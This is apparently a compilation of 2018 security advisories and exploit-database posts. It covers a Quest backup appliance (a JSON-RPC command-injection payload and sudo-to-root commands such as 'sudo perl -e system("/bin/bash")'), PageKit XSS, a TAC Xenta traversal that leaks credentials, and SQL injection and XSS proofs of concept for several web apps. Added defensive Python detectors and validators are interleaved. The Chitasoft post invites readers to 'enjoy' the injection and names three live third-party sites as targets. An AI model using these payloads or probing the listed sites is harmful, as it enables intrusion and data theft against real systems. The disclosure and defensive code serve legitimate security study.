  "jsonrpc": "2.0",
  "method": "reconnect_member",
  "params": {
    "classname": "DRGlobalView",
    "UserName": "pepito",
    "Password": "pepito123",
    "RemoteHost": "; sleep 10; echo "
  },
  "id": 1
}
—–/
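
Sections 7.24 to 7.46 share one request shape: a JSON-RPC call to /ws/v1.0/jsonrpc whose string parameter carries shell metacharacters. The detector below is an added example for log review or WAF tuning, not code from the advisory or from Quest; the sample requests are constructed here, and the metacharacter list is a general heuristic rather than anything taken from the appliance.

```python
import json
import re

JSONRPC_PATH = "/ws/v1.0/jsonrpc"

# Characters and sequences that turn a value into shell syntax once it is
# spliced into a command line. A general heuristic: no legitimate parameter
# of this endpoint should contain them.
SHELL_META_RE = re.compile(r"[;|&`\n]|\$\(|\$\{")

# Constructed sample of captured (request line, body) pairs: two benign
# calls, two shaped like the proofs of concept, one for another path.
SAMPLE_REQUESTS = [
    ("POST /ws/v1.0/jsonrpc HTTP/1.1",
     '{"jsonrpc":"2.0","method":"set","params":{"classname":"DRDns","dns_suffix":"corp.example.com"},"id":1}'),
    ("POST /ws/v1.0/jsonrpc HTTP/1.1",
     '{"jsonrpc":"2.0","method":"add","params":{"classname":"DREmailAlerts","emailAddress":"ops@example.com"},"id":2}'),
    ("POST /ws/v1.0/jsonrpc HTTP/1.1",
     '{"jsonrpc":"2.0","method":"set","params":{"classname":"DRHostname","hostname":"; sleep 10; #"},"id":3}'),
    ("POST /ws/v1.0/jsonrpc HTTP/1.1",
     '{"jsonrpc":"2.0","method":"add_member","params":{"classname":"DRGlobalView","UserName":"u","Password":"p","RemoteHost":"; sleep 10; echo "},"id":4}'),
    ("POST /other HTTP/1.1", '{"x":"a;b"}'),
]


def _walk_strings(node, path=""):
    """Yield (json_path, value) for every string anywhere under node."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk_strings(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def inspect_request(request_line: str, body: str) -> list:
    """Return findings (method, classname, param path, value) for string
    parameters of a JSON-RPC call that carry shell metacharacters."""
    parts = request_line.split()
    if len(parts) < 2 or parts[1] != JSONRPC_PATH:
        return []
    try:
        rpc = json.loads(body)
    except json.JSONDecodeError:
        return [("malformed", None, None, body[:40])]
    params = rpc.get("params", {})
    classname = params.get("classname") if isinstance(params, dict) else None
    findings = []
    for path, value in _walk_strings(params):
        if path == "classname":  # selects the service module, not user data
            continue
        if SHELL_META_RE.search(value):
            findings.append((rpc.get("method"), classname, path, value))
    return findings


def scan(requests) -> list:
    return [f for line, body in requests for f in inspect_request(line, body)]


if __name__ == "__main__":
    for method, cls, path, value in scan(SAMPLE_REQUESTS):
        print(f"ALERT method={method} classname={cls} param={path} value={value!r}")
```

Credential-bearing parameters (Password, passphrase) will produce noise, since a password may legitimately contain a semicolon; on this appliance the passphrase parameters were themselves injectable (7.34, 7.36, 7.37), so the better tuning is to alert on them and review, not to exclude them.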

7.47. *Privilege escalation from web server user to root via perl*

[CVE-2018-11189]
The web server is running as the webadmin user. Exploiting any of the
command injection vulnerabilities outlined in the previous sections would
then result in ‘webadmin’ level access.

The webadmin user has sudo access to run the perl interpreter as root,
presumably to operate the various scripts that are called from the web
application. However, this means that an attacker who manages to execute
code in the context of the web server can easily escalate user privileges
to root by running arbitrary code via the perl interpreter.

/—–
sh-3.2$ id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
sh-3.2$ sudo perl -e 'system("/bin/bash")'

id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

—–/

7.48. *Privilege escalation from web server user to root via env*

[CVE-2018-11190]
The webadmin user has sudo access to run the /bin/env binary with root
permissions, resulting in direct privilege escalation.

/—–
[email protected] > sudo env -i /bin/sh
sh-3.2# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

7.49. *Privilege escalation from web server user to root via local scripts*

[CVE-2018-11191]
The webadmin user is allowed to run local configuration scripts located in
/usr/local/bin with root level permissions and without requiring a password.
In particular, there is an ‘exec.sh’ shell script that allows users to execute
arbitrary commands. Because it can be run via sudo, this results once again
in privilege escalation to root.

/—–
[email protected] > id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
[email protected] > sudo /usr/local/bin/exec.sh /bin/bash

NOTICE: To capture 'service' session output please use 'capture' command.
Type 'exit' to stop the capture.

Total alert messages : 0

[email protected] > id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

7.50. *Privilege escalation from web server user to root via strace*

[CVE-2018-11192]
The strace binary can be run by the webadmin user with root privileges.
In reality, this means that arbitrary processes are run as root, opening
another vector to escalate privileges once the web server is compromised.

/—–
[email protected] > id
uid=154(webadmin) gid=154(webadmin) groups=0(root),154(webadmin)
[email protected] > sudo strace /usr/bin/id
[…]
read(3, "root:x:0:root,admin,administrato"..., 4096) = 731
close(3) = 0
munmap(0x2ba34633d000, 4096) = 0
write(1, "uid=0(root) gid=0(root) groups=0"..., 88uid=0(root)
gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
) = 88
close(1) = 0
munmap(0x2ba34633c000, 4096) = 0
exit_group(0) = ?
—–/

7.51. *Privilege escalation from web server user to root via ocashell*

[CVE-2018-11193]
The ocashell script located in the /usr/local/bin directory spawns a bash
shell and can be executed by the webadmin user via sudo. This results in a
command line shell with root privileges.

/—–
[email protected] > sudo /usr/local/bin/ocashell

NOTICE: To capture 'service' session output please use 'capture' command.
Type 'exit' to stop the capture.

Total alert messages : 0

[email protected] > id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/

7.52. *Privilege escalation from web server user to root via setsid*

[CVE-2018-11194]
Another command that can be run via sudo once code execution as the webadmin
user is achieved is the /usr/bin/setsid binary. This binary is used to run a
program in a new session, resulting in local privilege escalation to root.

/—–
[email protected] > sudo /usr/bin/setsid id > /tmp/pepito
[email protected] > cat /tmp/pepito
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—–/
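
Sections 7.47 to 7.52 describe one misconfiguration from six angles: sudoers rules that let the web server account run, without a password, programs that in turn execute whatever the caller chooses. The audit script below is an added example and not code from the appliance or from Quest; the sudoers fragment is constructed to resemble the rules described, and the list of shell-capable programs is a general one rather than anything taken from the appliance.

```python
import re
import shlex

# Constructed sudoers fragment modelled on the rules described in 7.47-7.52.
# Not the appliance's real /etc/sudoers; the exact rule text is assumed.
SUDOERS_SAMPLE = """\
# constructed example
Defaults    requiretty
root        ALL=(ALL) ALL
webadmin    ALL=(root) NOPASSWD: /usr/bin/perl, /bin/env, /usr/bin/strace
webadmin    ALL=(root) NOPASSWD: /usr/bin/setsid, /usr/local/bin/exec.sh
webadmin    ALL=(root) NOPASSWD: /usr/local/bin/ocashell
webadmin    ALL=(root) NOPASSWD: /usr/bin/systemctl restart httpd
backup      ALL=(root) NOPASSWD: /usr/local/bin/*
"""

# Programs that run a caller-chosen program or interpret caller-supplied
# code: granting any of them through sudo is equivalent to granting root.
SHELL_CAPABLE = {
    "perl", "python", "python3", "ruby", "env", "strace", "ltrace", "gdb",
    "setsid", "nohup", "nice", "timeout", "sh", "bash", "find", "awk",
    "vi", "vim", "less", "more",
}

SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

# user  host=(runas) TAG: cmd, cmd, ...   (a subset of the sudoers grammar)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text: str):
    """Yield (user, runas_user, nopasswd, command) for each user rule."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        runas = (m.group("runas") or "root").split(":")[0].strip()
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                yield m.group("user"), runas, nopasswd, cmd


def audit(text: str) -> list:
    """Return (user, command, reason, nopasswd) for rules that hand root to
    a non-root account through a program that can run anything."""
    findings = []
    for user, runas, nopasswd, cmd in parse_sudoers(text):
        if user == "root" or runas not in ("root", "ALL"):
            continue
        if cmd == "ALL":
            findings.append((user, cmd, "unrestricted root", nopasswd))
            continue
        prog = shlex.split(cmd)[0]
        name = prog.rsplit("/", 1)[-1]
        if "*" in prog:
            reason = "wildcard command path"
        elif name in SHELL_CAPABLE:
            reason = f"{name} runs arbitrary programs"
        elif name.endswith(".sh") or prog.startswith("/usr/local/bin/"):
            reason = "local script: review whether it can spawn a shell"
        else:
            continue
        findings.append((user, cmd, reason, nopasswd))
    return findings


if __name__ == "__main__":
    for user, cmd, reason, nopasswd in audit(SUDOERS_SAMPLE):
        flag = "NOPASSWD " if nopasswd else ""
        print(f"{user}: {flag}{cmd}  [{reason}]")
```

The local-script findings need a manual look at the script itself; for exec.sh and ocashell the advisory has already done that review (7.49 and 7.51). The fix on the appliance side is the one the advisory implies: no sudo rule for an interpreter or process wrapper, and for scripts that must run as root, a fixed argument list and a script that takes no caller-controlled command.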

8. *Report Timeline*
2018-01-31: Core Security sent an initial notification to Quest Software Inc.
(Quest), asking for GPG keys in order to send the draft advisory.
2018-01-31: Quest Support answered asking for the advisory in clear text.
2018-01-31: Core Security sent the draft advisory in clear text form.
2018-01-31: Quest Support replied that they had received the draft advisory
and would review it.
2018-02-07: Core Security requested an update from Quest regarding the
reported vulnerabilities and a tentative schedule.
2018-02-07: Quest Support answered that it had opened a bug id to track the
fixes and asked Core Security for a tentative publication date.
2018-02-07: Core Security answered that its intention was to coordinate the
release, adjusting the schedule to Quest’s development timeline.
2018-02-08: Quest Support replied that engineering was testing the fixes and
should have an estimated timeline the week of 12 February.
2018-02-15: Core Security requested a status update.
2018-02-22: Core Security again requested a status update and an estimated
timescale.
2018-02-22: Quest Support answered that it is trying to get an update from
the engineering team.
2018-03-01: Core Security requested a status update and a solidified
timeline.
2018-03-01: Quest Support replied saying that engineering is planning to
have a patch ready by the end of March.
2018-03-01: Core Security thanked Quest for the follow-up and replied that
it would contact Quest in two weeks.
2018-03-15: Core Security requested a status update.
2018-03-26: Core Security requested a status update again.
2018-03-26: Quest Support answered saying it will get an update from the
engineering team.
2018-04-10: Quest Support reported that the latest build, 4.0.3.1, addresses
the vulnerabilities that were reported.
2018-04-10: Core Security asked if all the vulnerabilities reported are
addressed by this build.
2018-05-31: Advisory CORE-2018-0002 published.

9. *References*

[1] https://www.quest.com/products/dr-series-disk-backup-appliances/

10. *About CoreLabs*

CoreLabs, the research center of Core Security, is charged with anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.

11. *About Core Security*

Core Security provides companies with the security insight they need to
know who, how, and what is vulnerable in their organization. The company’s
threat-aware, identity & access, network security, and vulnerability
management solutions provide actionable insight and context needed to
manage security risks across the enterprise. This shared insight gives
customers a comprehensive view of their security posture to make better
security remediation decisions. Better insight allows organizations to
prioritize their efforts to protect critical assets, take action sooner
to mitigate access risk, and react faster if a breach does occur.

Core Security is headquartered in the USA with offices and operations in
South America, Europe, Middle East and Asia. To learn more, contact Core
Security at (678) 304-4500 or [email protected]

12. *Disclaimer*

The contents of this advisory are copyright (c) 2018 Core Security and
(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security advisories
team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

PageKit CMS 1.0.13 Cross Site Scripting

CVE ID: CVE-2018-11564

Stored XSS in PageKit CMS 1.0.13 allows a user to upload malicious code via
the picture upload feature.
A user with elevated privileges could upload a photo to the system in SVG
format. The file is stored as uploaded; it is neither stripped nor filtered.
The user can then create a link on the website pointing to "/storage/poc.svg",
which resolves to http://localhost/pagekit/storage/poc.svg. When another user
clicks that link, it triggers an XSS attack.
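
For an upload feature like the one described, the server-side check that stops this is to reject SVG documents that contain script elements, event-handler attributes or javascript: links. The validator below is an added example, not PageKit's code; the element and attribute lists are a conservative general set, and the sample documents are constructed.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that execute script or embed foreign (HTML) content in a viewer.
ACTIVE_ELEMENTS = {"script", "foreignObject"}
# Attributes that carry a URL the viewer will follow.
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}
JS_SCHEME_RE = re.compile(r"^\s*javascript\s*:", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags/attributes."""
    return name.rsplit("}", 1)[-1]


def svg_findings(svg_bytes: bytes) -> list:
    """Return the reasons an uploaded SVG should be rejected; [] means none
    of the checked patterns are present. The stdlib parser keeps the sample
    short; on a real upload path use defusedxml so that entity-expansion
    documents are refused as well."""
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if root.tag != f"{{{SVG_NS}}}svg":
        return [f"root element is not svg: {root.tag}"]
    reasons = []
    for el in root.iter():
        name = _local(el.tag)
        if name in ACTIVE_ELEMENTS:
            reasons.append(f"active element <{name}>")
        for attr, value in el.attrib.items():
            aname = _local(attr)
            if aname.lower().startswith("on"):  # onload, onclick, onbegin, ...
                reasons.append(f"event handler {aname} on <{name}>")
            elif attr in HREF_ATTRS and JS_SCHEME_RE.match(value):
                reasons.append(f"javascript URL in {aname} on <{name}>")
    return reasons


def accept_upload(filename: str, data: bytes) -> bool:
    """Upload policy: an .svg file is accepted only when no findings remain.
    Other image types would go through their own decoders (not shown)."""
    if not filename.lower().endswith(".svg"):
        return False
    return svg_findings(data) == []


# Constructed samples (not the PageKit proof of concept).
CLEAN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
             b'<circle cx="5" cy="5" r="4" fill="red"/></svg>')
SCRIPT_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'
HANDLER_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">'
               b'<rect width="1" height="1"/></svg>')
LINK_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
            b'<a xlink:href="javascript:alert(1)"><text>x</text></a></svg>')

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN_SVG), ("script", SCRIPT_SVG),
                       ("handler", HANDLER_SVG), ("link", LINK_SVG)]:
        print(label, "->", svg_findings(doc) or "accepted")
```

Validation on upload is the first layer; the second is how the stored file is served. Delivering user uploads from a separate origin, or with a Content-Security-Policy header that forbids script, means a document that slips past the validator still cannot run in the site's origin.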

TAC Xenta 511 / 911 Credential Disclosure

# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
# Date: 25.05.2018
# Exploit Author: Marek Cybul
# Vendor Homepage: https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
# Version: 5.17

# Schneider Electric TAC Xenta 911 and 511 PLCs

Directory traversal in help manuals allows for credentials extraction

Devices are not indexed by crawlers such as Shodan or Censys because of their
ancient SSL configuration; an old browser was needed to connect to them (not
even s_client, curl or ncat could).

Example URI: /www/help/public/../../../sys/pswd

vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv

HTTP/1.0 200 OK

root
super user
/
/
/
password
0
900
3
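
The traversal above works because the `..` segments in the request path are resolved against the device filesystem instead of being confined to the help directory. The handler below is an added example of the check a web server should apply, not code from the Xenta firmware; the mapping of the /www/help/public/ prefix onto an on-disk directory of the same name is an assumption.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# URL prefix under which the help manuals are served (from the URI above).
HELP_PREFIX = "/www/help/public/"
# Directory the prefix maps to on disk: an assumption for this example.
HELP_ROOT = "/www/help/public"


def resolve_under_root(root: str, rel: str):
    """Lexically resolve rel against root and return the absolute path, or
    None when '..' segments would climb above root. posixpath keeps the
    check filesystem-free and testable; a real handler then applies
    os.path.realpath to the result to defeat symlinks before opening it."""
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, rel.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


def help_file_for(request_uri: str):
    """Map a request URI onto a help file, or None when it must be refused
    (wrong prefix, embedded NUL, or a path that escapes the help root)."""
    path = urlsplit(request_uri).path
    path = unquote(path)  # percent-decode exactly once, after splitting off the query
    if "\x00" in path or not path.startswith(HELP_PREFIX):
        return None
    return resolve_under_root(HELP_ROOT, path[len(HELP_PREFIX):])


if __name__ == "__main__":
    for uri in ["/www/help/public/manual/ch1.html",
                "/www/help/public/../../../sys/pswd",
                "/www/help/public/%2e%2e/%2e%2e/%2e%2e/sys/pswd"]:
        print(uri, "->", help_file_for(uri) or "REFUSED")
```

Decoding once and then normalizing is the order that matters: normalizing before decoding lets `%2e%2e` through as a literal, and decoding twice turns `%252e` into a traversal that the first check never saw.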

New STAR 2.1 Cross Site Scripting / SQL Injection

Posted May 31, 2018
Authored by Kagan Capar

New STAR version 2.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
MD5 | a856c03164de7ba7c99d58887aa40da0
# Exploit Title: New STAR 2.1 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kagan Capar
# Contact: [email protected]
# Vendor Homepage: https://codecanyon.net/item/new-star-listen-youtube-music/7486113
# Version: 2.1
# Category: Webapps
# Tested on: Kali Linux
# Description : The input field handled by 'ajax.php' contains an SQL injection
# vulnerability. The search section also contains an XSS vulnerability.
====================================================

# PoC : SQLi :

Parameter: name (GET)

Type: AND/OR time-based blind
Demo:
http://site.com/requests/ajax.php?newstar=login&name=admin&password=123456
Title: MySQL >= 5.0.12 AND time-based blind
Payload: newstar=login&name=admin' AND SLEEP(5) AND
'ddni'='ddni&password=123456

====================================================

# PoC : XSS :

Payload(1) :
http://site.com/play?mouse_search=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&p=1

PHP Dashboards NEW 5.5 SQL Injection

# Exploit Title: PHP Dashboards NEW v5.5 - 'Login' SQL Injection
# Dork: N/A
# Date: 31.05.2018
# Exploit Author: Kagan Capar
# Contact: [email protected]
# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104

# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query. Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
====================================================

# PoC : SQLi :

POST /php/save/user.php?mode=lookup HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 52
Cookie: PHPSESSID=phcubu5ohtdjnd6g1bmsncro87
Connection: keep-alive
email=test%40test.com&password=test123&dashboardKey=

Parameter: email (POST)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: [email protected]' AND SLEEP(5) AND
'XnxG'='XnxG&password=test123&dashboardKey=

====================================================

CSV Import And Export 1.1.0 Cross Site Scripting / SQL Injection

# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kagan Capar
# Contact: [email protected]
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The 'offset' and 'db' parameters of the database table
# preview query are vulnerable.
====================================================
# PoC : SQLi :

Parameter: offset (GET)
Type: UNION query
Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&[email protected]:3306&table=clients&order=asc&offset=30&limit=10
Title: Generic UNION query (NULL) - 10 columns
Payload: action=export_getInput&[email protected]:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL-- STgb&limit=10

====================================================
# PoC : XSS :

Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10

Grid Pro Big Data 1.0 SQL Injection

# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348

# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : Multiple parameters of the 'test.php' query contain
# SQLi vulnerabilities.
====================================================
# PoC : SQLi :

POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive
page=1&on_home=5&table_name=be&params%5B0%5D%5Btype%5D=text&params%5B0%5D%5Bvalue%5D=&params%5B0%5D%5Bname%5D=Name&params%5B1%5D%5Btype%5D=text&params%5B1%5D%5Bvalue%5D=&params%5B1%5D%5Bname%5D=Surname&params%5B2%5D%5Btype%5D=num_range&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bvalue%5D%5B%5D=&params%5B2%5D%5Bname%5D=Age&params%5B3%5D%5Btype%5D=date&params%5B3%5D%5Bvalue%5D=&params%5B3%5D%5Bname%5D=Born_date&ordering=none

Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL-- LEgG&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND 1906=1906 AND '%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=%' AND SLEEP(5) AND '%'='&params[0][name]=Name&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none

Parameter: params[0][name] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=2&on_home=5&table_name=be&params[0][type]=text&params[0][value]=&params[0][name]=Name) AND SLEEP(5) AND (2977=2977&params[1][type]=text&params[1][value]=&params[1][name]=Surname&params[2][type]=num_range&params[2][value][]=&params[2][value][]=&params[2][name]=Age&params[3][type]=date&params[3][value]=&params[3][name]=Born_date&ordering=none
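
A defender-side check for the request shape in the PoCs above, added here as an example (it is not part of the advisory or of the Grid Pro product): it decodes the urlencoded body, requires `page` and `on_home` to be plain integers, and flags the UNION, boolean-tautology and time-based markers the payloads use, including inside the nested `params[i][value]` filter fields. The sample bodies are constructed from the advisory's payloads, and the allowed `ordering` vocabulary is an assumption.

```python
import re
from urllib.parse import parse_qs

# Constructed POST bodies modelled on the advisory's PoC requests (not live captures).
BENIGN = ("page=1&on_home=5&table_name=be&params[0][type]=text&params[0][value]="
          "&params[0][name]=Name&ordering=none")
UNION_BODY = ("page=2&on_home=5 UNION ALL SELECT CONCAT('qjbqq','x'),NULL,NULL,NULL-- LEgG"
              "&table_name=be&params[0][value]=")
BOOL_BODY = ("page=2&on_home=5&table_name=be&params[0][type]=text"
             "&params[0][value]=%' AND 1906=1906 AND '%'='&params[0][name]=Name")
SLEEP_BODY = ("page=2&on_home=5&table_name=be&params[0][type]=text"
              "&params[0][value]=%' AND SLEEP(5) AND '%'='&params[0][name]=Name")

INT_FIELDS = {"page", "on_home"}                       # must be plain integers
ENUM_FIELDS = {"ordering": {"none", "asc", "desc"}}    # assumed allowed vocabulary

# Signatures taken from the three payload families shown in the advisory.
SQLI_MARKERS = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "quote-tautology": re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
}


def inspect_body(body):
    """Return (field, reason) findings for one urlencoded POST body.

    parse_qs leaves keys such as 'params[0][value]' intact (encoded or literal
    brackets), so the nested grid filter fields get the same checks as
    top-level ones. An empty list means the body passed every check.
    """
    findings = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if field in INT_FIELDS and not value.isdigit():
                findings.append((field, "non-integer"))
            if field in ENUM_FIELDS and value not in ENUM_FIELDS[field]:
                findings.append((field, "outside-vocabulary"))
            for reason, marker in SQLI_MARKERS.items():
                if marker.search(value):
                    findings.append((field, reason))
                    break
    return findings


if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("union", UNION_BODY),
                       ("boolean", BOOL_BODY), ("sleep", SLEEP_BODY)]:
        print(name, inspect_body(body))
```

The same decode-then-validate step belongs in the endpoint itself: integer fields cast with a strict parser and filter values passed only as bound parameters, so the markers above never need to be matched in production.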

====================================================

Chitasoft 3.6.2 SQL Injection

# Exploit Title: chitasoft Login Page SQL Injection Vulnerability
# Version : 3.6.2
# Exploit Author: Hesam Bazvand
# Software Link: http://sharetronix.ir/wp-content/uploads/2014/10/gold.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Dork : O*O+-OSSOU O3OSSUOa : UUOaOSSO3OSSUOa
# Email : [email protected]

Exploit : Insert ' in the Username field and enjoy.

Demo Targets : http://gilletteshop.ir/account.php
http://mehregan.co/account.php
http://www.onlineyadak.com/